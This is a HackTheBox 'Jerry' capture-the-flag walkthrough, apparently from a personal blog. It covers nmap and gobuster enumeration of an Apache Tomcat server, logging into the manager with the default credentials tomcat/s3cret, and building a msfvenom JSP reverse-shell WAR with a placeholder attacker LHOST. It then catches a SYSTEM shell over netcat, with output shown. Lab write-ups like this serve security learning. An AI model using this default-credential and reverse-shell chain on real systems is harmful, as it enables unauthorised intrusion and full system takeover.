> ## Documentation Index
> Fetch the complete documentation index at: https://blog.daehyung.dev/llms.txt
> Use this file to discover all available pages before exploring further.

# HackTheBox Jerry

> Windows machine walkthrough from enumeration to privilege escalation.

# Enumeration

## Run Nmap Scan

```bash theme={null}
nmap -p- -T4 -Pn 10.129.136.9

"
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-29 17:21 BST
Nmap scan report for 10.129.136.9
Host is up (0.18s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 364.58 seconds
"
```

## **View Website**

<img src="https://mintcdn.com/student-32fdab5f/z5JQv_pywsDVgmiH/hackthebox-windows/images/jerry/untitled.png?fit=max&auto=format&n=z5JQv_pywsDVgmiH&q=85&s=44c040516bd1886de5e4e091e74084f4" alt="Untitled" width="1680" height="794" data-path="hackthebox-windows/images/jerry/untitled.png" />

## Directory Bruteforcing (Run Gobuster)

```bash theme={null}
gobuster dir -u http://10.129.136.9:8080/ -w /usr/share/wordlists/dirb/common.txt 

"
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.136.9:8080/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/09/29 17:29:20 Starting gobuster in directory enumeration mode
===============================================================
/aux                  (Status: 200) [Size: 0]
/com1                 (Status: 200) [Size: 0]
/com2                 (Status: 200) [Size: 0]
/com3                 (Status: 200) [Size: 0]
/con                  (Status: 200) [Size: 0]
/docs                 (Status: 302) [Size: 0] [--> /docs/]
/examples             (Status: 302) [Size: 0] [--> /examples/]
/favicon.ico          (Status: 200) [Size: 21630]             
/host-manager         (Status: 302) [Size: 0] [--> /host-manager/]
/manager              (Status: 302) [Size: 0] [--> /manager/]     
                                                                  
===============================================================
2023/09/29 17:30:45 Finished
===============================================================
"
```

## Visit /host-manager

<img src="https://mintcdn.com/student-32fdab5f/z5JQv_pywsDVgmiH/hackthebox-windows/images/jerry/untitled-1.png?fit=max&auto=format&n=z5JQv_pywsDVgmiH&q=85&s=a7b8658dda37bbf47174e1dcf889a573" alt="Untitled" width="1680" height="792" data-path="hackthebox-windows/images/jerry/untitled-1.png" />

### Default Credentials

```
username: tomcat
password: s3cret
```

# Exploitation

## Visit /manager

Use the default credentials, we gained from the “/host-manager” page

<img src="https://mintcdn.com/student-32fdab5f/z5JQv_pywsDVgmiH/hackthebox-windows/images/jerry/untitled-2.png?fit=max&auto=format&n=z5JQv_pywsDVgmiH&q=85&s=c1bf670271774a4840fd7713d7a5ca5f" alt="Untitled" width="497" height="306" data-path="hackthebox-windows/images/jerry/untitled-2.png" />

## Finding a File Upload Menu

<img src="https://mintcdn.com/student-32fdab5f/z5JQv_pywsDVgmiH/hackthebox-windows/images/jerry/untitled-3.png?fit=max&auto=format&n=z5JQv_pywsDVgmiH&q=85&s=406bda4bdc4935417e13bc5fe795d4b3" alt="Untitled" width="1680" height="722" data-path="hackthebox-windows/images/jerry/untitled-3.png" />

## Generating Reverse Shell

```bash theme={null}
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker ip> LPORT=4444 -f war -o reverse.war
```

## Uploading our Reverse Shell

<img src="https://mintcdn.com/student-32fdab5f/z5JQv_pywsDVgmiH/hackthebox-windows/images/jerry/untitled-4.png?fit=max&auto=format&n=z5JQv_pywsDVgmiH&q=85&s=6159051d240247b9249fc85360082e09" alt="Untitled" width="1672" height="84" data-path="hackthebox-windows/images/jerry/untitled-4.png" />

## Listen to Reverse Shell and Execute the Reverse Shell

<img src="https://mintcdn.com/student-32fdab5f/z5JQv_pywsDVgmiH/hackthebox-windows/images/jerry/untitled-5.png?fit=max&auto=format&n=z5JQv_pywsDVgmiH&q=85&s=c300fa4e3a34c2507e51b3113c5fbef0" alt="Untitled" width="1663" height="55" data-path="hackthebox-windows/images/jerry/untitled-5.png" />

Click “/reverse” button to route to /reverse, then you will gain a reverse shell

```bash theme={null}
nc -lvnp 4444

"
nc -lvnp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.136.9.
Ncat: Connection from 10.129.136.9:49203.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami /user
whoami /user

USER INFORMATION
----------------

User Name           SID     
=================== ========
nt authority\system S-1-5-18

C:\apache-tomcat-7.0.88>
"
```
